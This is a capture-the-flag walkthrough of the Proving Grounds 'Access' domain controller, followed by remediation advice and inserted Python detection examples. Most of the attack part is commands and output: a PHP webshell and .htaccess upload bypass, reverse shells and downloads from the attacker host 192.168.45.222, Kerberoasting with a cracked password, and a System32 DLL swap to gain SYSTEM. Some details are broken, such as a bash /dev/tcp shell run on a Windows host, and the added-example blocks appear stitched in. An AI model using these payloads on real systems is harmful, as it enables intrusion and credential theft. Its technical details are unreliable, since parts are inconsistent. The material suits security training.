Box Overview

Access is a Windows Active Directory machine from Offensive Security’s Proving Grounds featuring file upload bypass, Kerberoasting attacks, and privilege escalation via SeManageVolumePrivilege exploitation.

Domain: access.offsec

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.229.187 -T4 -oN first.scan -p-

Open Ports:

  • 53/tcp - DNS
  • 80/tcp - HTTP (Apache 2.4.48 - XAMPP)
  • 88/tcp - Kerberos
  • 135/tcp - MSRPC
  • 139/445/tcp - SMB
  • 389/636/tcp - LDAP
  • 5985/tcp - WinRM
  • 9389/tcp - .NET Message Framing

Service Info:

  • Host: SERVER
  • Domain: access.offsec
  • OS: Windows Server (Domain Controller)

Initial Reconnaissance

Add to /etc/hosts:

echo "192.168.229.187 access.offsec SERVER.access.offsec" | sudo tee -a /etc/hosts

Web Exploitation - Port 80

Application Discovery

Technology Stack (Wappalyzer):

  • Apache 2.4.48 (Win64)
  • PHP 8.0.7
  • OpenSSL 1.1.1k
  • XAMPP Stack

Functionality: File upload feature present on main page

File Upload Bypass

Direct PHP Upload Blocked

Attempted to upload PHP webshell:

<?php system($_REQUEST['cmd']); ?>

Result: .php extension blocked by upload filter

.htaccess Bypass

Created malicious .htaccess file:

echo "AddType application/x-httpd-php .dork" > .htaccess

Explanation:

  • Instructs Apache to treat .dork files as PHP
  • Bypasses extension whitelist/blacklist

Upload successful!

PHP Webshell Creation

Generated reverse shell (revshells.com):

<?php
// PHP reverse shell payload
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.222/135 0>&1'");
?>

Saved as: revshell.dork

Port selection: Using port 135 (MSRPC, seen open in the scan) because an outbound firewall is likely to allow it.

Upload Directory Discovery

gobuster dir -u http://192.168.229.187 \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt

Result:

/UPLOADS (Status: 301) [--> http://192.168.229.187/UPLOADS/]

Upload location identified! 🎯

Initial Access

Setup listener:

nc -nlvp 135

Trigger webshell:

http://192.168.229.187/UPLOADS/revshell.dork

Shell caught!

C:\xampp\htdocs\uploads> whoami
access\svc_apache

C:\xampp\htdocs\uploads> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Limited service account - need to escalate!

User Enumeration

C:\Users> dir
 Volume in drive C has no label.

 Directory of C:\Users

04/08/2022  02:40 AM    <DIR>          .
04/08/2022  02:40 AM    <DIR>          ..
05/28/2021  03:53 AM    <DIR>          Administrator
05/28/2021  03:53 AM    <DIR>          Public
04/08/2022  02:39 AM    <DIR>          svc_apache
04/08/2022  02:40 AM    <DIR>          svc_mssql

Target identified: svc_mssql - likely has elevated privileges!

Lateral Movement - Kerberoasting

SPN Enumeration

Tool: Get-SPN.ps1

C:\Users\Public> certutil -urlcache -split -f http://192.168.45.222:80/Get-SPN.ps1

C:\Users\Public> powershell -ep bypass
PS C:\Users\Public> .\Get-SPN.ps1

Output (relevant):

Object Name =  MSSQL
DN          =  CN=MSSQL,CN=Users,DC=access,DC=offsec
Object Cat. =  CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec
servicePrincipalNames
SPN( 1 )    =  MSSQLSvc/DC.access.offsec

MSSQL service account found! 🎯

Kerberoasting Attack

Tool: Invoke-Kerberoast.ps1

PS C:\Users\Public> Set-ExecutionPolicy Unrestricted -Scope Process
PS C:\Users\Public> Import-Module ./Invoke-kerberoast.ps1
PS C:\Users\Public> Invoke-Kerberoast

TGS Ticket Extracted:

TicketByteHexStream  : 
Hash                 : $krb5tgs$MSSQLSvc/DC.access.offsec:AD17CD5C4C46F5177BEA02AB39DAE531$E49279...
SamAccountName       : svc_mssql
DistinguishedName    : CN=MSSQL,CN=Users,DC=access,DC=offsec
ServicePrincipalName : MSSQLSvc/DC.access.offsec

Hash Cracking

# Clean hash (remove unnecessary data)
echo '$krb5tgs$23$*MSSQLSvc/DC.access.offsec*$ad17cd5c...' > mssql.hashcat

# Crack with hashcat
hashcat -m 13100 mssql.hashcat /usr/share/wordlists/rockyou.txt --force

Cracked in seconds!

$krb5tgs$23$*MSSQLSvc/DC.access.offsec*...:trustno1

Credentials obtained: svc_mssql:trustno1

Credential Validation

crackmapexec smb 192.168.229.187 -u svc_mssql -d access.offsec -p "trustno1" --shares

Result:

SMB  192.168.229.187  445  SERVER  [+] access.offsec\svc_mssql:trustno1 
Share           Permissions     Remark
-----           -----------     ------
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
SYSVOL          READ            Logon server share

Valid credentials confirmed!

Lateral Movement via RunAs

Challenge: WinRM not enabled for svc_mssql

Solution: Use RunasCs to execute commands as svc_mssql

Tool: Invoke-RunasCs.ps1

Generate Reverse Shell Payload

msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.45.222 LPORT=1337 \
  -f exe -o revshell_access.exe

Execute as svc_mssql

PS C:\Users\Public> Set-ExecutionPolicy Unrestricted -Scope Process
PS C:\Users\Public> Import-Module ./Invoke-RunasCs.ps1
PS C:\Users\Public> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "revshell_access.exe"

[*] Warning: The logon for user 'svc_mssql' is limited.

Shell caught as svc_mssql!

C:\Windows\system32> whoami
access\svc_mssql

C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled

Key finding: SeManageVolumePrivilege present! 🎯

Privilege Escalation - SeManageVolumePrivilege

Vulnerability Research

Reference: SeManageVolumeExploit

Attack Strategy:

  1. Exploit SeManageVolumePrivilege to gain write access to C:\
  2. Replace C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll
  3. Trigger DLL load via COM object instantiation
  4. DLL executes as SYSTEM

Step 1: Gain C:\ Write Access

Tool: SeManageVolumeExploit.exe

C:\Users\Public> certutil -urlcache -split -f http://192.168.45.222:80/SeManageVolumeExploit.exe

C:\Users\Public> .\SeManageVolumeExploit.exe
Entries changed: 924
DONE

Arbitrary C:\ write access achieved!

Step 2: Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.45.222 LPORT=9001 \
  -f dll -o Printconfig.dll

Step 3: Replace System DLL

PS> cd C:\Windows\System32\spool\drivers\x64\3

PS> iwr -uri http://192.168.45.222:80/Printconfig.dll -Outfile PrintConfig.dll

PS> dir

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
...
-a----        5/29/2024   4:18 AM           9216 PrintConfig.dll    <-- Our malicious DLL                                                  
-a----         4/8/2022  12:18 AM        3565568 PrintConfig.dll.bak  <-- Original backed up
...

Step 4: Trigger Execution

Setup listener:

sudo rlwrap nc -lnvp 9001

Instantiate COM object (triggers DLL load):

PS> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS> $object = [Activator]::CreateInstance($type)

SYSTEM shell obtained! 🎯

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
0c8c404d3b88625584c2f2e59ea7130f

Root flag captured - Owned!

Attack Chain Summary

  1. Web Enumeration → Found file upload on XAMPP
  2. .htaccess Upload → Bypassed PHP extension filter
  3. Webshell Upload → Uploaded .dork file treated as PHP
  4. Initial Access → Shell as svc_apache
  5. SPN Discovery → Found MSSQL service account
  6. Kerberoasting → Extracted TGS ticket
  7. Hash Cracking → Recovered password: trustno1
  8. Lateral Movement → RunasCs to execute as svc_mssql
  9. Privilege Discovery → Identified SeManageVolumePrivilege
  10. SeManage Exploit → Gained C:\ write access
  11. DLL Hijacking → Replaced PrintConfig.dll
  12. COM Trigger → Loaded malicious DLL as SYSTEM
  13. System Compromise → Full domain admin access

Vulnerability Analysis

File Upload Bypass

Vulnerability: Insufficient upload validation

Weak Protection

// Vulnerable code pattern: a blocklist on the client-supplied extension
$blocked = ['php'];
$ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
if (in_array($ext, $blocked)) {
    die("File type not allowed");
}
// Everything else is stored under its original name in a web-served directory,
// so .htaccess (extension "htaccess") and revshell.dork (extension "dork") both pass.
move_uploaded_file($_FILES['file']['tmp_name'], "uploads/" . $_FILES['file']['name']);

.htaccess Abuse

How it works:

  1. Upload .htaccess with custom AddType directive
  2. Apache reads .htaccess from upload directory
  3. Subsequent uploads with custom extension execute as PHP

Exploitation:

AddType application/x-httpd-php .dork
AddType application/x-httpd-php .hack
AddType application/x-httpd-php .pwn
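The checks a defender wants on the upload handler, as an added example (not code from the writeup or from the box): it is a Python rendering of what the remediation section asks for (content sniffing, extension allow-list, random rename) plus an explicit refusal of dotfiles, which is the check that stops an uploaded .htaccess. The file names and byte strings are constructed test inputs.

```python
"""Server-side upload validation that closes the holes this chain used.

Added example, not the page's or any project's code. It mirrors the checks
the remediation section describes (content sniffing, extension allow-list,
random rename) and adds an explicit refusal of dotfiles such as .htaccess.
Sample inputs used with it are constructed.
"""
import os
import secrets

# Allowed extension -> magic bytes the file content must start with.
MAGIC = {
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
}


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(filename: str, content: bytes) -> str:
    """Return a random server-side filename for an acceptable upload.

    Raises UploadRejected for anything else. The client's filename is used
    only to read the extension; it is never reused on disk.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        # .htaccess, .user.ini, .htpasswd: configuration, never user content
        raise UploadRejected("hidden/configuration files are not allowed")
    if base.count(".") != 1:
        # Refuse "shell.php.jpg": Apache can apply handlers to inner extensions
        raise UploadRejected("exactly one extension is required")
    ext = base.rsplit(".", 1)[1].lower()
    magic = MAGIC.get(ext)
    if magic is None:
        # .php, .dork, .phtml, ... are all refused by the allow-list
        raise UploadRejected(f"extension .{ext} is not allowed")
    if not content.startswith(magic):
        # A PHP file renamed to .jpg fails here, like PHP's finfo check would
        raise UploadRejected("content does not match the declared type")
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if the upload would be stored."""
    try:
        validate_upload(filename, content)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # Constructed inputs: the two files from this writeup and one real-looking PNG
    for name, data in [(".htaccess", b"AddType application/x-httpd-php .dork"),
                       ("revshell.dork", b"<?php ... ?>"),
                       ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]:
        print(f"{name:14} -> {'accepted' if is_accepted(name, data) else 'rejected'}")
```

The magic-byte check is not a complete defence on its own: a valid PNG header with PHP appended passes it. That is why the Apache directory configuration (AllowOverride None and no PHP handler for the upload directory) has to be the second layer.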

Kerberoasting

Attack Overview:

Step 1: SPN Discovery

# Find accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Step 2: Request TGS Ticket

# Request service ticket (anyone can do this!)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC.access.offsec"

Step 3: Extract & Crack

# Ticket encrypted with service account's password
# Crack offline - no failed login attempts!
hashcat -m 13100 ticket.hash rockyou.txt

Why it works:

  • Service tickets encrypted with account password (not computer secret)
  • No authentication required to request tickets
  • Weak passwords = easy crack
  • No failed login events logged

SeManageVolumePrivilege Abuse

Privilege Purpose: Manage disk volumes (defrag, diskpart operations)

Security Impact: Can create junction points and modify volume structures

Exploitation Technique

SeManageVolumeExploit mechanism:

  1. Create Mount Point
     C:\target -> \??\C:\
  2. Modify NTFS Metadata
     • Exploits privilege to alter file security descriptors
     • Grants Everyone group full control
     • Affects entire C:\ drive
  3. DLL Hijacking Opportunity
     • Write to C:\Windows\System32\spool\drivers\x64\3\
     • Replace PrintConfig.dll
     • Loaded by Print Spooler service (SYSTEM)

COM Object Trigger

# CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} = PrintNotify
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
# Instantiation triggers DllMain() in PrintConfig.dll

Remediation

File Upload Security

Validation

// Proper file upload validation
// 1. Check the real content type, not the client-supplied name or Content-Type header
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif'];
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES['file']['tmp_name']);
finfo_close($finfo);

if (!in_array($mime, $allowed_mime, true)) {
    die("Invalid file type");
}

// 2. Validate extension (a dotfile such as .htaccess yields "htaccess", which is not listed)
$allowed_ext = ['jpg', 'jpeg', 'png', 'gif'];
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));

if (!in_array($ext, $allowed_ext, true)) {
    die("Invalid extension");
}

// 3. Store under a random name, never the client's, ideally outside the web root
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], "/uploads/$new_name");

Apache Configuration

# Disable .htaccess in upload directories: with AllowOverride None an uploaded
# .htaccess is ignored, so AddType can no longer map .dork (or anything else) to PHP.
# php_flag applies to mod_php only; with PHP-FPM, deny the PHP handler for this
# directory instead. Apache does not allow comments on directive lines.
<Directory "/var/www/uploads">
    AllowOverride None
    Options -ExecCGI
    php_flag engine off
</Directory>

Kerberoasting Prevention

Strong Service Account Passwords

# Generate a 64-character random password (0-9, A-Z, a-z), one draw per position.
# Get-Random -Count selects without replacement, so "-Count 64" over this
# 62-character alphabet would return only 62 characters, each used exactly once.
$chars = [char[]]((48..57) + (65..90) + (97..122))
$Password = -join (1..64 | ForEach-Object { Get-Random -InputObject $chars })
Set-ADAccountPassword -Identity svc_mssql -NewPassword (ConvertTo-SecureString $Password -AsPlainText -Force)

Managed Service Accounts

# Group Managed Service Account: the DC generates and rotates the 240-byte password,
# so nothing is guessable. Needs Add-KdsRootKey once per forest; the SPN moves to the gMSA.
New-ADServiceAccount -Name gMSA_MSSQL -DNSHostName DC.access.offsec `
  -ServicePrincipalNames "MSSQLSvc/DC.access.offsec" `
  -PrincipalsAllowedToRetrieveManagedPassword "SERVER$"
Install-ADServiceAccount -Identity gMSA_MSSQL   # run on the SQL host (SERVER$), not elsewhere

Monitoring

# Alert on service-ticket requests (Event ID 4769, Kerberos Service Ticket Requested) that
# use RC4-HMAC (Ticket Encryption Type 0x17): modern clients negotiate AES, so RC4 tickets
# for user service accounts stand out. Property indices: 0 = requester, 2 = service, 5 = etype.
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} |
  Where-Object { $_.Properties[5].Value -eq '0x17' -and $_.Properties[2].Value -notlike '*$' } |
  Select-Object TimeCreated, @{n='Requester';e={$_.Properties[0].Value}}, @{n='Service';e={$_.Properties[2].Value}}
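The same detection idea carried a step further, as an added example that is not part of the writeup: besides flagging RC4 tickets for user service accounts, it looks for one requester asking for tickets to several distinct service accounts inside a short window, which is how Invoke-Kerberoast and similar tools behave. The records are constructed to mirror the 4769 fields (Account Name = requester, Service Name = target account, Ticket Encryption Type, Client Address); only svc_mssql comes from the box, the other service names and addresses are invented for the sample.

```python
"""Detection logic for Kerberoasting in Security event 4769 records.

Added example, not part of the original writeup. The records below are
constructed to mirror the 4769 fields a SIEM or Get-WinEvent would return;
only svc_mssql comes from the writeup, the other names are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                    # etype that hashcat -m 13100 cracks; AES is 0x11/0x12
BURST_THRESHOLD = 3                  # distinct service accounts requested by one principal ...
BURST_WINDOW = timedelta(minutes=5)  # ... within this window

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"time": "2024-05-29T04:10:01", "account": "svc_apache@ACCESS.OFFSEC",
     "service": "svc_mssql", "etype": "0x17", "client": "::ffff:192.168.229.187"},
    {"time": "2024-05-29T04:10:02", "account": "svc_apache@ACCESS.OFFSEC",
     "service": "svc_web", "etype": "0x17", "client": "::ffff:192.168.229.187"},
    {"time": "2024-05-29T04:10:02", "account": "svc_apache@ACCESS.OFFSEC",
     "service": "svc_backup", "etype": "0x17", "client": "::ffff:192.168.229.187"},
    # Benign: a workstation asks for a ticket to the DC's computer account with AES.
    {"time": "2024-05-29T04:11:00", "account": "WS01$@ACCESS.OFFSEC",
     "service": "SERVER$", "etype": "0x12", "client": "::ffff:192.168.229.50"},
    # RC4 ticket for a computer account: machine passwords are long and random,
    # so this is not a cracking target (still worth fixing through policy).
    {"time": "2024-05-29T04:12:00", "account": "WS02$@ACCESS.OFFSEC",
     "service": "SERVER$", "etype": "0x17", "client": "::ffff:192.168.229.51"},
]


def rc4_user_service_requests(events):
    """Events where a ticket for a *user* service account was issued with RC4.

    Accounts ending in '$' are computer accounts and are excluded: their
    tickets are encrypted with a long random machine password.
    """
    return [e for e in events
            if e["etype"] == RC4_HMAC and not e["service"].endswith("$")]


def burst_requesters(events, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Map requester -> sorted service accounts, for requesters that asked for
    tickets to at least `threshold` distinct service accounts within `window`.
    Roasting tools request every SPN at once, so this is a strong signal.
    """
    by_account = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):  # ISO-8601 sorts lexically
        by_account[e["account"]].append(e)

    alerts = {}
    for account, evs in by_account.items():
        for i, first in enumerate(evs):
            t0 = datetime.fromisoformat(first["time"])
            services = {x["service"] for x in evs[i:]
                        if datetime.fromisoformat(x["time"]) - t0 <= window}
            if len(services) >= threshold:
                alerts[account] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for e in rc4_user_service_requests(SAMPLE_EVENTS):
        print(f"RC4 ticket for {e['service']} requested by {e['account']} from {e['client']}")
    for account, services in burst_requesters(SAMPLE_EVENTS).items():
        print(f"burst: {account} requested {len(services)} service accounts: {services}")
```

Feed it the output of the Get-WinEvent query above (or a SIEM export) rather than the sample list; tune BURST_THRESHOLD against normal traffic before alerting on it.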

SeManageVolumePrivilege Hardening

Remove Privilege

# Audit who has SeManageVolumePrivilege (holders appear as *SID entries;
# the default on a domain controller is BUILTIN\Administrators, S-1-5-32-544)
secedit /export /cfg secpol.cfg
Get-Content secpol.cfg | Select-String "SeManageVolumePrivilege"

# Remove from service accounts unless absolutely necessary
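A small checker for that export, as an added example (not from the writeup): it parses the [Privilege Rights] section secedit writes and lists every holder of the right that is not on an allow-list. The policy text inside it is a constructed sample and the S-1-5-21-... SID is a placeholder, not the box's real domain SID.

```python
"""Check who holds SeManageVolumePrivilege in a secedit export.

Added example, not from the original writeup. It parses the [Privilege Rights]
section written by `secedit /export /cfg secpol.cfg` (the file is UTF-16 on
disk; read it with encoding="utf-16"). The policy text below is a constructed
sample; the S-1-5-21-... SID in it is a placeholder, not the box's real SID.
"""

PRIVILEGE = "SeManageVolumePrivilege"

# Default holder of "Perform volume maintenance tasks" on a domain controller.
ALLOWED_SIDS = {"S-1-5-32-544"}          # BUILTIN\Administrators

SAMPLE_SECPOL = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-551
SeManageVolumePrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeMachineAccountPrivilege = *S-1-5-11
[Version]
signature="$CHICAGO$"
Revision=1
"""


def privilege_holders(secpol_text, privilege=PRIVILEGE):
    """Return the principals listed for `privilege`, with secedit's leading '*'
    (which marks a SID rather than an account name) stripped."""
    section = None
    for raw in secpol_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Privilege Rights" or "=" not in line:
            continue
        name, _, value = line.partition("=")
        if name.strip() == privilege:
            return [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
    return []                                # right not assigned to anyone


def unexpected_holders(secpol_text, allowed=frozenset(ALLOWED_SIDS)):
    """Holders of the privilege that are not on the allow-list: the candidates
    for removal (a service account such as svc_mssql would show up here)."""
    return [h for h in privilege_holders(secpol_text) if h not in allowed]


if __name__ == "__main__":
    import sys
    from pathlib import Path
    # Pass the secedit export as argv[1]; otherwise the constructed sample is used.
    text = Path(sys.argv[1]).read_text(encoding="utf-16") if len(sys.argv) > 1 else SAMPLE_SECPOL
    for sid in unexpected_holders(text):
        print(f"{PRIVILEGE} granted to unexpected principal: {sid}")
```

Two caveats when acting on the output: the export shows the effective local policy, so a right that arrives through a GPO has to be removed in that GPO, and SQL Server setup commonly grants this very right to its service account for instant file initialization, so removing it from an account like svc_mssql trades away that feature.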

Monitoring

# Enable auditing of privilege use. "Perform volume maintenance tasks" is in the
# Non Sensitive list, so the Sensitive subcategory alone will not record it
# (the Non Sensitive subcategory is noisy; filter on the privilege name).
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:enable /failure:enable

# Monitor for:
# - Event ID 4673 (Sensitive privilege use) where Privileges = SeManageVolumePrivilege
# - Event ID 4907 (Auditing settings changed)

DLL Hijacking Prevention

# Enable Windows Defender Application Control
# Implement strict DLL load policies
# Use signed DLLs only in system directories

Tools Used

  • nmap
  • Wappalyzer
  • gobuster
  • Burp Suite
  • netcat
  • certutil
  • Get-SPN.ps1
  • Invoke-Kerberoast.ps1
  • hashcat
  • crackmapexec
  • Invoke-RunasCs.ps1
  • msfvenom
  • SeManageVolumeExploit.exe

Techniques

  • Active Directory enumeration
  • File upload bypass via .htaccess
  • Webshell deployment
  • Kerberoasting attack
  • Offline password cracking
  • Lateral movement via RunAs
  • Token privilege enumeration
  • SeManageVolumePrivilege exploitation
  • DLL hijacking
  • COM object abuse

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice


“From Apache to SYSTEM - when privileges meet perseverance.”